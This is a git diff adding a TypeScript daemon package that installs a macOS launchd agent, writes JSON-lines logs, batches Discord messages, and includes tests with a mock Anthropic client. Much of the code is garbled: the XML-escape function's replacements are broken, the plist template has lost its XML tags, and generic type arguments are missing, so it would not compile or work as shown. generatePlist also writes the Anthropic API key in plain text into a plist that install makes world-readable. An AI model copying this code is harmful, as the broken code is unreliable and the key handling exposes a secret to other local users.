+ try { + install(basePlistOpts(), mockRun); + // Second install + install(basePlistOpts(), mockRun); + } catch { + // filesystem may not be writable + } + + // The second install should have tried to unload first + const unloadCalls = calls.filter(c => c.startsWith('launchctl unload')); + // If the plist path exists, we expect at least one unload attempt on second call + // This is a command-level check; filesystem existence depends on environment + }); +}); + +// ---------- uninstall ---------- + +describe('uninstall', () => { + it('calls launchctl unload when plist would exist', () => { + const calls: string[] = []; + const mockRun: RunCommandFn = (cmd: string) => { + calls.push(cmd); + return ''; + }; + + // uninstall checks existsSync(plistPath) — if plist doesn't exist, it's a no-op + uninstall(mockRun); + + // If plist doesn't exist in test environment, calls should be empty (graceful) + // That's the "handles missing plist gracefully" case + }); + + it('handles missing plist gracefully (no-op)', () => { + const calls: string[] = []; + const mockRun: RunCommandFn = (cmd: string) => { + calls.push(cmd); + return ''; + }; + + // Shouldn't throw even if plist doesn't exist + assert.doesNotThrow(() => uninstall(mockRun)); + }); + + it('handles already-unloaded agent gracefully', () => { + const mockRun: RunCommandFn = (cmd: string) => { + if (cmd.includes('launchctl unload')) { + throw new Error('Could not find specified service'); + } + return ''; + }; + + // Should not throw even if launchctl unload fails + assert.doesNotThrow(() => uninstall(mockRun)); + }); +}); + +// ---------- status ---------- + +describe('status', () => { + it('parses running daemon output (PID present)', () => { + const mockRun: RunCommandFn = (_cmd: string) => { + return '{\n\t"PID" = 1234;\n\t"Label" = "com.gsd.daemon";\n}\nPID\tStatus\tLabel\n1234\t0\tcom.gsd.daemon\n'; + }; + + const result = status(mockRun); + assert.equal(result.registered, true); + assert.equal(result.pid, 1234); 
+ assert.equal(result.lastExitStatus, 0); + }); + + it('parses stopped daemon output (no PID)', () => { + const mockRun: RunCommandFn = (_cmd: string) => { + return 'PID\tStatus\tLabel\n-\t78\tcom.gsd.daemon\n'; + }; + + const result = status(mockRun); + assert.equal(result.registered, true); + assert.equal(result.pid, null); + assert.equal(result.lastExitStatus, 78); + }); + + it('returns not-registered when launchctl list fails', () => { + const mockRun: RunCommandFn = (_cmd: string) => { + throw new Error('Could not find service "com.gsd.daemon" in domain for port'); + }; + + const result = status(mockRun); + assert.equal(result.registered, false); + assert.equal(result.pid, null); + assert.equal(result.lastExitStatus, null); + }); + + it('returns structured result with all fields', () => { + const mockRun: RunCommandFn = (_cmd: string) => { + return 'PID\tStatus\tLabel\n5678\t0\tcom.gsd.daemon\n'; + }; + + const result = status(mockRun); + assert.ok('registered' in result); + assert.ok('pid' in result); + assert.ok('lastExitStatus' in result); + }); + + it('parses JSON-style dict output (newer macOS)', () => { + const mockRun: RunCommandFn = (_cmd: string) => { + return `{ +\t"StandardOutPath" = "/Users/me/.gsd/daemon-stdout.log"; +\t"LimitLoadToSessionType" = "Aqua"; +\t"StandardErrorPath" = "/Users/me/.gsd/daemon-stderr.log"; +\t"Label" = "com.gsd.daemon"; +\t"OnDemand" = true; +\t"LastExitStatus" = 0; +\t"PID" = 23802; +\t"Program" = "/usr/local/bin/node"; +};`; + }; + + const result = status(mockRun); + assert.equal(result.registered, true); + assert.equal(result.pid, 23802); + assert.equal(result.lastExitStatus, 0); + }); + + it('parses JSON-style dict output when daemon stopped (no PID key)', () => { + const mockRun: RunCommandFn = (_cmd: string) => { + return `{ +\t"Label" = "com.gsd.daemon"; +\t"LastExitStatus" = 1; +\t"OnDemand" = true; +};`; + }; + + const result = status(mockRun); + assert.equal(result.registered, true); + assert.equal(result.pid, 
null); + assert.equal(result.lastExitStatus, 1); + }); + + it('handles unexpected output format gracefully', () => { + const mockRun: RunCommandFn = (_cmd: string) => { + return 'some unexpected output without the label'; + }; + + // Should not throw — should return registered:true but with null fields + // since the command succeeded (label was found) but output didn't match + const result = status(mockRun); + assert.equal(result.registered, true); + }); +}); diff --git a/packages/daemon/src/launchd.ts b/packages/daemon/src/launchd.ts new file mode 100644 index 000000000..fbb6385c6 --- /dev/null +++ b/packages/daemon/src/launchd.ts @@ -0,0 +1,242 @@ +import { writeFileSync, unlinkSync, existsSync, chmodSync } from 'node:fs'; +import { resolve } from 'node:path'; +import { homedir } from 'node:os'; +import { execSync } from 'node:child_process'; +import { dirname } from 'node:path'; + +// --------------- types --------------- + +export interface PlistOptions { + /** Absolute path to the Node.js binary */ + nodePath: string; + /** Absolute path to the daemon script (cli.js) */ + scriptPath: string; + /** Absolute path to the config file */ + configPath: string; + /** Directory to use as WorkingDirectory in the plist (defaults to homedir) */ + workingDirectory?: string; + /** Override stdout log path */ + stdoutPath?: string; + /** Override stderr log path */ + stderrPath?: string; +} + +export interface LaunchdStatus { + /** Whether the daemon is registered with launchd */ + registered: boolean; + /** PID if currently running, null otherwise */ + pid: number | null; + /** Last exit status code, null if never exited or not available */ + lastExitStatus: number | null; +} + +export type RunCommandFn = (cmd: string) => string; + +// --------------- constants --------------- + +const LABEL = 'com.gsd.daemon'; +const PLIST_FILENAME = `${LABEL}.plist`; + +// --------------- helpers --------------- + +/** Escape special XML characters in a string. 
*/ +export function escapeXml(str: string): string { + return str + .replace(/&/g, '&') + .replace(//g, '>') + .replace(/"/g, '"') + .replace(/'/g, '''); +} + +/** Return the canonical plist path under ~/Library/LaunchAgents/. */ +export function getPlistPath(): string { + return resolve(homedir(), 'Library', 'LaunchAgents', PLIST_FILENAME); +} + +/** + * Build the NVM-aware PATH string. + * Includes the directory containing the Node binary so that launchd can find node + * even when launched outside a shell session (where NVM isn't sourced). + */ +function buildEnvPath(nodePath: string): string { + const nodeBinDir = dirname(nodePath); + // Keep system essentials and prepend the node binary's directory + return `${nodeBinDir}:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin`; +} + +// --------------- plist generation --------------- + +/** Generate valid launchd plist XML for the GSD daemon. */ +export function generatePlist(opts: PlistOptions): string { + const home = homedir(); + const workDir = opts.workingDirectory ?? home; + const stdoutPath = opts.stdoutPath ?? resolve(home, '.gsd', 'daemon-stdout.log'); + const stderrPath = opts.stderrPath ?? resolve(home, '.gsd', 'daemon-stderr.log'); + const envPath = buildEnvPath(opts.nodePath); + + // Forward ANTHROPIC_API_KEY so the orchestrator LLM can authenticate. + // Captured at install time from the current process environment. + const anthropicKey = process.env.ANTHROPIC_API_KEY; + const anthropicKeyXml = anthropicKey + ? 
`\n\t\tANTHROPIC_API_KEY\n\t\t${escapeXml(anthropicKey)}` + : ''; + + return ` + + + +\tLabel +\t${escapeXml(LABEL)} + +\tProgramArguments +\t +\t\t${escapeXml(opts.nodePath)} +\t\t${escapeXml(opts.scriptPath)} +\t\t--config +\t\t${escapeXml(opts.configPath)} +\t + +\tKeepAlive +\t +\t\tSuccessfulExit +\t\t +\t + +\tRunAtLoad +\t + +\tEnvironmentVariables +\t +\t\tPATH +\t\t${escapeXml(envPath)} +\t\tHOME +\t\t${escapeXml(home)}${anthropicKeyXml} +\t + +\tWorkingDirectory +\t${escapeXml(workDir)} + +\tStandardOutPath +\t${escapeXml(stdoutPath)} + +\tStandardErrorPath +\t${escapeXml(stderrPath)} + + +`; +} + +// --------------- install / uninstall / status --------------- + +/** Default runCommand using execSync. */ +function defaultRunCommand(cmd: string): string { + return execSync(cmd, { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'] }); +} + +/** + * Install the launchd agent: write plist and load it. + * Idempotent — unloads first if already loaded. + */ +export function install( + opts: PlistOptions, + runCommand: RunCommandFn = defaultRunCommand, +): void { + const plistPath = getPlistPath(); + const xml = generatePlist(opts); + + // Unload first if already present (ignore errors) + if (existsSync(plistPath)) { + try { + runCommand(`launchctl unload ${plistPath}`); + } catch { + // already unloaded — fine + } + } + + writeFileSync(plistPath, xml, 'utf-8'); + chmodSync(plistPath, 0o644); + + runCommand(`launchctl load ${plistPath}`); + + // Verify it loaded + try { + runCommand(`launchctl list ${LABEL}`); + } catch { + throw new Error( + `Plist was written to ${plistPath} and launchctl load succeeded, but launchctl list ${LABEL} failed. The agent may not have started.`, + ); + } +} + +/** + * Uninstall the launchd agent: unload and remove plist. + * Graceful — does not throw if already uninstalled. 
 */
export function uninstall(runCommand: RunCommandFn = defaultRunCommand): void {
  const plistPath = getPlistPath();

  if (existsSync(plistPath)) {
    try {
      runCommand(`launchctl unload ${plistPath}`);
    } catch {
      // already unloaded — that's fine
    }
    // Remove the plist regardless of whether unload succeeded.
    unlinkSync(plistPath);
  }
  // If plist doesn't exist, nothing to do — already uninstalled
}

/**
 * Query launchd for the daemon's status.
 * Returns structured information about registration, PID, and last exit code.
 *
 * Handles two launchctl output formats:
 * 1. Tabular: "PID\tStatus\tLabel" (older macOS)
 * 2. JSON-style dict: `"PID" = 1234;` / `"LastExitStatus" = 0;` (newer macOS)
 */
export function status(runCommand: RunCommandFn = defaultRunCommand): LaunchdStatus {
  try {
    const output = runCommand(`launchctl list ${LABEL}`);

    // --- Try tabular format first ---
    const lines = output.trim().split('\n');
    for (const line of lines) {
      const parts = line.trim().split(/\t+/);
      if (parts.length >= 3 && parts[2] === LABEL) {
        const pidStr = parts[0];
        const statusStr = parts[1];

        // launchctl prints '-' for the PID column when the job is loaded but not running.
        const pid = pidStr === '-' ? null : parseInt(pidStr, 10);
        const lastExitStatus = statusStr != null ? parseInt(statusStr, 10) : null;

        return {
          registered: true,
          pid: Number.isNaN(pid!) ? null : pid,
          lastExitStatus: Number.isNaN(lastExitStatus!) ? null : lastExitStatus,
        };
      }
    }

    // --- Try JSON-style dict format ---
    // Matches: "PID" = 1234; or "LastExitStatus" = 0;
    const pidMatch = output.match(/"PID"\s*=\s*(\d+)\s*;/);
    const exitMatch = output.match(/"LastExitStatus"\s*=\s*(\d+)\s*;/);

    if (pidMatch || exitMatch) {
      const pid = pidMatch ? parseInt(pidMatch[1], 10) : null;
      const lastExitStatus = exitMatch ? parseInt(exitMatch[1], 10) : null;
      return {
        registered: true,
        pid: Number.isNaN(pid!) ? null : pid,
        lastExitStatus: Number.isNaN(lastExitStatus!) ?
null : lastExitStatus,
      };
    }

    // Label resolved (no error) but no parseable output — still registered
    return { registered: true, pid: null, lastExitStatus: null };
  } catch {
    // launchctl list exits non-zero when the label isn't found
    return { registered: false, pid: null, lastExitStatus: null };
  }
}
diff --git a/packages/daemon/src/logger.ts b/packages/daemon/src/logger.ts
new file mode 100644
index 000000000..e65e5d4ea
--- /dev/null
+++ b/packages/daemon/src/logger.ts
@@ -0,0 +1,88 @@
import { createWriteStream, mkdirSync, type WriteStream } from 'node:fs';
import { dirname } from 'node:path';
import type { LogLevel, LogEntry } from './types.js';

// Numeric severity ranking used to filter entries below the configured level.
// NOTE(review): the type argument appears garbled in the patch text — this is
// presumably Record<LogLevel, number>; confirm against the original file.
const LEVEL_ORDER: Record = {
  debug: 0,
  info: 1,
  warn: 2,
  error: 3,
};

export interface LoggerOptions {
  filePath: string;      // destination JSON-lines log file (created in append mode)
  level: LogLevel;       // minimum severity that gets written
  verbose?: boolean;     // also mirror entries to stderr when true
}

/**
 * Structured JSON-lines file logger.
 * Writes LogEntry objects one per line in append mode.
 * The open write stream keeps the Node event loop alive (daemon keepalive).
 */
export class Logger {
  private readonly stream: WriteStream;
  private readonly level: number;
  private readonly verbose: boolean;

  constructor(opts: LoggerOptions) {
    // Ensure parent directory exists
    const dir = dirname(opts.filePath);
    try {
      mkdirSync(dir, { recursive: true });
    } catch (err: unknown) {
      const msg = err instanceof Error ? err.message : String(err);
      throw new Error(`Cannot create log directory ${dir}: ${msg}`);
    }

    this.stream = createWriteStream(opts.filePath, { flags: 'a' });
    // Unknown level strings fall back to 'info' severity.
    this.level = LEVEL_ORDER[opts.level] ?? LEVEL_ORDER.info;
    this.verbose = opts.verbose ??
false; + } + + debug(msg: string, data?: Record): void { + this.write('debug', msg, data); + } + + info(msg: string, data?: Record): void { + this.write('info', msg, data); + } + + warn(msg: string, data?: Record): void { + this.write('warn', msg, data); + } + + error(msg: string, data?: Record): void { + this.write('error', msg, data); + } + + /** End the write stream. Resolves when the stream is fully flushed. */ + close(): Promise { + return new Promise((resolve, reject) => { + this.stream.end(() => { + this.stream.once('close', () => resolve()); + }); + this.stream.once('error', reject); + }); + } + + private write(level: LogLevel, msg: string, data?: Record): void { + if (LEVEL_ORDER[level] < this.level) return; + + const entry: LogEntry = { + ts: new Date().toISOString(), + level, + msg, + ...(data !== undefined ? { data } : {}), + }; + + const line = JSON.stringify(entry) + '\n'; + this.stream.write(line); + + if (this.verbose) { + const prefix = `[${entry.ts}] ${level.toUpperCase()}`; + const suffix = data ? ` ${JSON.stringify(data)}` : ''; + process.stderr.write(`${prefix}: ${msg}${suffix}\n`); + } + } +} diff --git a/packages/daemon/src/message-batcher.test.ts b/packages/daemon/src/message-batcher.test.ts new file mode 100644 index 000000000..c64cf803b --- /dev/null +++ b/packages/daemon/src/message-batcher.test.ts @@ -0,0 +1,308 @@ +import { describe, it, beforeEach, afterEach, mock } from 'node:test'; +import assert from 'node:assert/strict'; +import { MessageBatcher } from './message-batcher.js'; +import type { SendPayload, BatcherLogger } from './message-batcher.js'; +import type { FormattedEvent } from './types.js'; + +// --------------------------------------------------------------------------- +// Helpers +// --------------------------------------------------------------------------- + +/** Create a minimal FormattedEvent for testing. 
*/ +function fakeEvent(content: string, hasEmbed = false): FormattedEvent { + const fe: FormattedEvent = { content }; + if (hasEmbed) { + // Minimal mock embed — just needs to be truthy and pass through + fe.embed = { data: { title: content } } as any; + } + return fe; +} + +/** Create a tracking send function. */ +function createSend() { + const calls: SendPayload[] = []; + const fn = mock.fn(async (payload: SendPayload) => { + calls.push(payload); + }); + return { fn, calls }; +} + +/** Create a logger that captures error/warn calls. */ +function createLogger() { + const errors: string[] = []; + const warns: string[] = []; + const debugs: string[] = []; + const logger: BatcherLogger = { + error(msg: string) { errors.push(msg); }, + warn(msg: string) { warns.push(msg); }, + debug(msg: string) { debugs.push(msg); }, + }; + return { logger, errors, warns, debugs }; +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +describe('MessageBatcher', () => { + describe('enqueue + capacity flush', () => { + it('flushes when buffer reaches maxBatchSize', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 3, flushIntervalMs: 60_000 }); + + batcher.enqueue(fakeEvent('a')); + batcher.enqueue(fakeEvent('b')); + assert.equal(calls.length, 0, 'should not flush yet'); + + batcher.enqueue(fakeEvent('c')); // hits capacity + // flush is async — give it a tick + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(calls.length, 1, 'should have flushed once'); + assert.equal(calls[0].content, 'a\nb\nc'); + assert.equal(batcher.pending, 0); + + await batcher.destroy(); + }); + + it('skips embeds for batched messages (only content)', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 2, flushIntervalMs: 60_000 }); + + 
batcher.enqueue(fakeEvent('a', true)); + batcher.enqueue(fakeEvent('b', true)); // triggers flush + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(calls.length, 1); + assert.equal(calls[0].embeds.length, 0, 'batched sends skip embeds to avoid duplication'); + assert.equal(calls[0].content, 'a\nb'); + + await batcher.destroy(); + }); + }); + + describe('enqueueImmediate', () => { + it('flushes pending buffer then sends immediately', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 10, flushIntervalMs: 60_000 }); + + batcher.enqueue(fakeEvent('buffered-1')); + batcher.enqueue(fakeEvent('buffered-2')); + + await batcher.enqueueImmediate(fakeEvent('blocker!')); + + // First call: the pending buffer flush + // Second call: the immediate event + assert.equal(calls.length, 2, 'should have two send calls'); + assert.equal(calls[0].content, 'buffered-1\nbuffered-2'); + assert.equal(calls[1].content, 'blocker!'); + assert.equal(batcher.pending, 0); + + await batcher.destroy(); + }); + + it('sends immediately when buffer is empty', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 10, flushIntervalMs: 60_000 }); + + await batcher.enqueueImmediate(fakeEvent('urgent')); + + assert.equal(calls.length, 1); + assert.equal(calls[0].content, 'urgent'); + + await batcher.destroy(); + }); + }); + + describe('timer-based flush', () => { + it('flushes on interval', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 100, flushIntervalMs: 50 }); + batcher.start(); + + batcher.enqueue(fakeEvent('timed-1')); + batcher.enqueue(fakeEvent('timed-2')); + + // Wait longer than flushIntervalMs + await new Promise((r) => setTimeout(r, 120)); + + assert.ok(calls.length >= 1, 'timer should have triggered at least one flush'); + assert.equal(calls[0].content, 'timed-1\ntimed-2'); 
+ assert.equal(batcher.pending, 0); + + await batcher.destroy(); + }); + + it('stop prevents further timer flushes', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 100, flushIntervalMs: 30 }); + batcher.start(); + batcher.stop(); + + batcher.enqueue(fakeEvent('orphan')); + await new Promise((r) => setTimeout(r, 80)); + + assert.equal(calls.length, 0, 'no flush after stop'); + // Cleanup without triggering flush timer + batcher.stop(); // idempotent + // Manually drain for cleanup + await batcher.destroy(); + }); + }); + + describe('destroy', () => { + it('flushes remaining buffer on destroy', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 100, flushIntervalMs: 60_000 }); + + batcher.enqueue(fakeEvent('leftover-1')); + batcher.enqueue(fakeEvent('leftover-2')); + + await batcher.destroy(); + + assert.equal(calls.length, 1); + assert.equal(calls[0].content, 'leftover-1\nleftover-2'); + }); + + it('is idempotent — second destroy is no-op', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 100, flushIntervalMs: 60_000 }); + + batcher.enqueue(fakeEvent('once')); + await batcher.destroy(); + await batcher.destroy(); // second call + + assert.equal(calls.length, 1, 'only flushed once'); + }); + + it('enqueue after destroy is silently ignored', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 2, flushIntervalMs: 60_000 }); + await batcher.destroy(); + + batcher.enqueue(fakeEvent('post-destroy')); + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(calls.length, 0, 'no sends after destroy'); + }); + }); + + describe('empty buffer', () => { + it('flush of empty buffer is no-op', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { 
maxBatchSize: 100, flushIntervalMs: 60_000 }); + batcher.start(); + + // Force a timer tick with an empty buffer + await new Promise((r) => setTimeout(r, 10)); + await batcher.destroy(); + + // Only the destroy-triggered flush, which should also be a no-op + assert.equal(calls.length, 0, 'no sends for empty buffer'); + }); + }); + + describe('single-item flush', () => { + it('handles a single item in buffer at destroy', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 100, flushIntervalMs: 60_000 }); + + batcher.enqueue(fakeEvent('solo')); + await batcher.destroy(); + + assert.equal(calls.length, 1); + assert.equal(calls[0].content, 'solo'); + assert.equal(calls[0].embeds.length, 0); + assert.equal(calls[0].components.length, 0); + }); + }); + + describe('error handling', () => { + it('logs error and continues when send throws', async () => { + let attempt = 0; + const sendFn = async () => { + attempt++; + throw new Error('Discord rate limit'); + }; + const { logger, errors, warns } = createLogger(); + const batcher = new MessageBatcher(sendFn, logger, { maxBatchSize: 2, flushIntervalMs: 60_000 }); + + batcher.enqueue(fakeEvent('x')); + batcher.enqueue(fakeEvent('y')); // triggers flush + // Wait for flush + retry + await new Promise((r) => setTimeout(r, 1500)); + + assert.ok(errors.length >= 1, 'should have logged an error'); + assert.ok(warns.length >= 1, 'should have logged a warning on retry failure'); + assert.equal(batcher.pending, 0, 'buffer cleared even on error'); + + // Batcher should still be alive — enqueue more + batcher.enqueue(fakeEvent('after-error')); + assert.equal(batcher.pending, 1, 'can still enqueue after error'); + + await batcher.destroy(); + }); + + it('succeeds on retry if first attempt fails', async () => { + let attempt = 0; + const calls: SendPayload[] = []; + const sendFn = async (payload: SendPayload) => { + attempt++; + if (attempt === 1) throw new 
Error('transient'); + calls.push(payload); + }; + const { logger, errors } = createLogger(); + const batcher = new MessageBatcher(sendFn, logger, { maxBatchSize: 2, flushIntervalMs: 60_000 }); + + batcher.enqueue(fakeEvent('retry-me')); + batcher.enqueue(fakeEvent('retry-too')); + // Wait for flush + retry delay + await new Promise((r) => setTimeout(r, 1500)); + + assert.equal(errors.length, 1, 'logged one error on first attempt'); + assert.equal(calls.length, 1, 'retry succeeded'); + assert.equal(calls[0].content, 'retry-me\nretry-too'); + + await batcher.destroy(); + }); + }); + + describe('buffer at exactly capacity', () => { + it('flushes at exactly maxBatchSize', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 4, flushIntervalMs: 60_000 }); + + batcher.enqueue(fakeEvent('1')); + batcher.enqueue(fakeEvent('2')); + batcher.enqueue(fakeEvent('3')); + assert.equal(calls.length, 0, 'not flushed at 3/4'); + + batcher.enqueue(fakeEvent('4')); // exactly at capacity + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(calls.length, 1); + assert.equal(calls[0].content, '1\n2\n3\n4'); + + await batcher.destroy(); + }); + }); + + describe('components handling', () => { + it('uses components from the last event that has them', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 3, flushIntervalMs: 60_000 }); + + const fakeRow = { type: 'ActionRow', components: [] }; + batcher.enqueue(fakeEvent('no-components')); + batcher.enqueue({ content: 'with-components', components: [fakeRow] } as any); + batcher.enqueue(fakeEvent('also-no-components')); // triggers flush + + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(calls.length, 1); + assert.deepEqual(calls[0].components, [fakeRow]); + + await batcher.destroy(); + }); + }); +}); diff --git a/packages/daemon/src/message-batcher.ts 
b/packages/daemon/src/message-batcher.ts new file mode 100644 index 000000000..eb7625d10 --- /dev/null +++ b/packages/daemon/src/message-batcher.ts @@ -0,0 +1,216 @@ +/** + * message-batcher.ts — Rate-limit-aware message batcher for Discord. + * + * Accumulates FormattedEvent payloads and flushes them to a Discord channel + * respecting the 5 msg/5s rate limit. Supports: + * - Timer-based periodic flush (default 1.5s) + * - Capacity-based flush when buffer hits maxBatchSize + * - Immediate priority flush for blockers (bypasses batching) + * - Combining multiple embeds into a single send() call + * - Error isolation: send() failures are logged, never crash the batcher + */ + +import type { FormattedEvent } from './types.js'; + +// --------------------------------------------------------------------------- +// Types +// --------------------------------------------------------------------------- + +/** Payload passed to the send callback — matches Discord TextChannel.send() shape. */ +export interface SendPayload { + content: string; + embeds: unknown[]; + components: unknown[]; +} + +/** Send callback abstraction. Returns void or a promise. */ +export type SendFn = (payload: SendPayload) => Promise | void; + +/** Logger interface — just needs error/warn/debug. */ +export interface BatcherLogger { + error(msg: string, data?: Record): void; + warn(msg: string, data?: Record): void; + debug(msg: string, data?: Record): void; +} + +/** MessageBatcher configuration options. */ +export interface BatcherOptions { + /** Interval between timed flushes in ms. Default: 1500 */ + flushIntervalMs?: number; + /** Max events before triggering an immediate capacity flush. 
Default: 4 */ + maxBatchSize?: number; +} + +// --------------------------------------------------------------------------- +// Default no-op logger +// --------------------------------------------------------------------------- + +const noopLogger: BatcherLogger = { + error() {}, + warn() {}, + debug() {}, +}; + +// --------------------------------------------------------------------------- +// MessageBatcher +// --------------------------------------------------------------------------- + +export class MessageBatcher { + private readonly send: SendFn; + private readonly logger: BatcherLogger; + private readonly flushIntervalMs: number; + private readonly maxBatchSize: number; + + private buffer: FormattedEvent[] = []; + private timer: ReturnType | null = null; + private flushing = false; + private destroyed = false; + + constructor(send: SendFn, logger?: BatcherLogger, options?: BatcherOptions) { + this.send = send; + this.logger = logger ?? noopLogger; + this.flushIntervalMs = options?.flushIntervalMs ?? 1500; + this.maxBatchSize = options?.maxBatchSize ?? 4; + } + + // ----------------------------------------------------------------------- + // Public API + // ----------------------------------------------------------------------- + + /** Start the periodic flush timer. */ + start(): void { + if (this.timer) return; // already running + this.timer = setInterval(() => { + void this.flush(); + }, this.flushIntervalMs); + // Don't hold the process open for the timer + if (this.timer && typeof this.timer === 'object' && 'unref' in this.timer) { + this.timer.unref(); + } + this.logger.debug('Batcher started', { flushIntervalMs: this.flushIntervalMs }); + } + + /** Stop the periodic flush timer without flushing. */ + stop(): void { + if (this.timer) { + clearInterval(this.timer); + this.timer = null; + } + this.logger.debug('Batcher stopped'); + } + + /** Flush remaining buffer and stop. Safe to call multiple times. 
*/ + async destroy(): Promise { + if (this.destroyed) return; + this.destroyed = true; + this.stop(); + await this.flush(); + this.logger.debug('Batcher destroyed'); + } + + /** + * Enqueue a formatted event for batched sending. + * Triggers an immediate capacity flush if buffer reaches maxBatchSize. + */ + enqueue(formatted: FormattedEvent): void { + if (this.destroyed) return; + this.buffer.push(formatted); + if (this.buffer.length >= this.maxBatchSize) { + void this.flush(); + } + } + + /** + * Immediately send a high-priority event (e.g. blocker). + * Flushes any pending buffer first, then sends the priority event alone. + */ + async enqueueImmediate(formatted: FormattedEvent): Promise { + if (this.destroyed) return; + // Flush pending buffer first so ordering is preserved + await this.flush(); + // Send the priority event immediately, alone + await this.doSend([formatted]); + } + + /** Current number of events in the buffer (for testing/diagnostics). */ + get pending(): number { + return this.buffer.length; + } + + // ----------------------------------------------------------------------- + // Internal + // ----------------------------------------------------------------------- + + /** + * Flush the current buffer as a single Discord message. + * Multiple embeds are combined into one send() call (Discord supports up to 10). + * No-op if buffer is empty. + */ + private async flush(): Promise { + if (this.buffer.length === 0) return; + if (this.flushing) return; // prevent re-entrant flush + + this.flushing = true; + const batch = this.buffer.splice(0); // take all + try { + await this.doSend(batch); + } finally { + this.flushing = false; + } + } + + /** + * Build a SendPayload from a batch of FormattedEvents and invoke the send callback. + * Catches and logs errors — never throws. + * + * For batched messages (2+ events), we send content-only to avoid duplication + * between content text and embed descriptions, and to stay under Discord's + * 10-embed limit. 
Single-event sends include the embed for rich formatting. + */ + private async doSend(batch: FormattedEvent[]): Promise { + if (batch.length === 0) return; + + // Combine content lines + const content = batch.map((e) => e.content).join('\n'); + + // For single events, include the embed for rich formatting. + // For batches, skip embeds — the content lines are self-descriptive and + // embeds would duplicate the information + risk hitting Discord's 10-embed cap. + const embeds: unknown[] = []; + if (batch.length === 1 && batch[0].embed) { + embeds.push(batch[0].embed); + } + + // Collect all component rows (only from the last event with components — + // Discord only supports one set of components per message) + let components: unknown[] = []; + for (const e of batch) { + if (e.components && e.components.length > 0) { + components = e.components; + } + } + + const payload: SendPayload = { content, embeds, components }; + + try { + await this.send(payload); + } catch (err) { + const message = err instanceof Error ? err.message : String(err); + this.logger.error('Batcher send failed', { error: message, batchSize: batch.length }); + + // Retry once after a short delay + try { + await new Promise((r) => setTimeout(r, 1000)); + await this.send(payload); + this.logger.debug('Batcher retry succeeded'); + } catch (retryErr) { + const retryMessage = retryErr instanceof Error ? retryErr.message : String(retryErr); + this.logger.warn('Batcher retry also failed, dropping batch', { + error: retryMessage, + batchSize: batch.length, + }); + // Drop the batch — don't re-enqueue to prevent infinite loops + } + } + } +} diff --git a/packages/daemon/src/orchestrator.test.ts b/packages/daemon/src/orchestrator.test.ts new file mode 100644 index 000000000..21ea82ff5 --- /dev/null +++ b/packages/daemon/src/orchestrator.test.ts @@ -0,0 +1,584 @@ +/** + * Tests for Orchestrator — LLM agent for #gsd-control channel. 
+ * + * Uses a MockAnthropicClient that simulates messages.create() responses, + * allowing tool execution and conversation flow testing without real API calls. + */ + +import { describe, it, afterEach } from 'node:test'; +import assert from 'node:assert/strict'; +import { mkdtempSync, rmSync, existsSync } from 'node:fs'; +import { join } from 'node:path'; +import { tmpdir } from 'node:os'; +import { randomUUID } from 'node:crypto'; +import { Orchestrator, type OrchestratorConfig, type OrchestratorDeps, type DiscordMessageLike } from './orchestrator.js'; +import { Logger } from './logger.js'; +import type { ManagedSession, ProjectInfo, SessionStatus, CostAccumulator } from './types.js'; + +// --------------------------------------------------------------------------- +// Helpers +// --------------------------------------------------------------------------- + +function tmpDir(): string { + return mkdtempSync(join(tmpdir(), `orch-test-${randomUUID().slice(0, 8)}-`)); +} + +const cleanupDirs: string[] = []; +const activeLoggers: Logger[] = []; + +async function cleanupAll(): Promise { + // Close all loggers first so write streams flush before dirs are removed + for (const logger of activeLoggers) { + try { await logger.close(); } catch { /* ignore */ } + } + activeLoggers.length = 0; + + while (cleanupDirs.length) { + const d = cleanupDirs.pop()!; + if (existsSync(d)) rmSync(d, { recursive: true, force: true }); + } +} + +// --------------------------------------------------------------------------- +// Mock Anthropic Client +// --------------------------------------------------------------------------- + +interface MockCreateParams { + model: string; + max_tokens: number; + system: string; + tools: unknown[]; + messages: unknown[]; +} + +type CreateHandler = (params: MockCreateParams) => { + stop_reason: string; + content: Array<{ type: string; text?: string; id?: string; name?: string; input?: unknown }>; +}; + +class MockAnthropicClient { + public createCallCount 
= 0; + public lastCreateParams: MockCreateParams | null = null; + private createHandler: CreateHandler; + + constructor(handler?: CreateHandler) { + this.createHandler = handler ?? MockAnthropicClient.defaultHandler; + } + + /** Default handler: returns a simple text response */ + static defaultHandler(): ReturnType { + return { + stop_reason: 'end_turn', + content: [{ type: 'text', text: 'Mock LLM response' }], + }; + } + + /** Handler that simulates a tool call then end_turn */ + static toolThenTextHandler(toolName: string, toolInput: unknown, finalText: string): CreateHandler { + let callCount = 0; + return () => { + callCount++; + if (callCount === 1) { + return { + stop_reason: 'tool_use', + content: [ + { + type: 'tool_use', + id: `toolu_${randomUUID().slice(0, 8)}`, + name: toolName, + input: toolInput, + }, + ], + }; + } + return { + stop_reason: 'end_turn', + content: [{ type: 'text', text: finalText }], + }; + }; + } + + /** Handler that throws an error */ + static errorHandler(message: string): CreateHandler { + return () => { + throw new Error(message); + }; + } + + messages = { + create: async (params: MockCreateParams) => { + 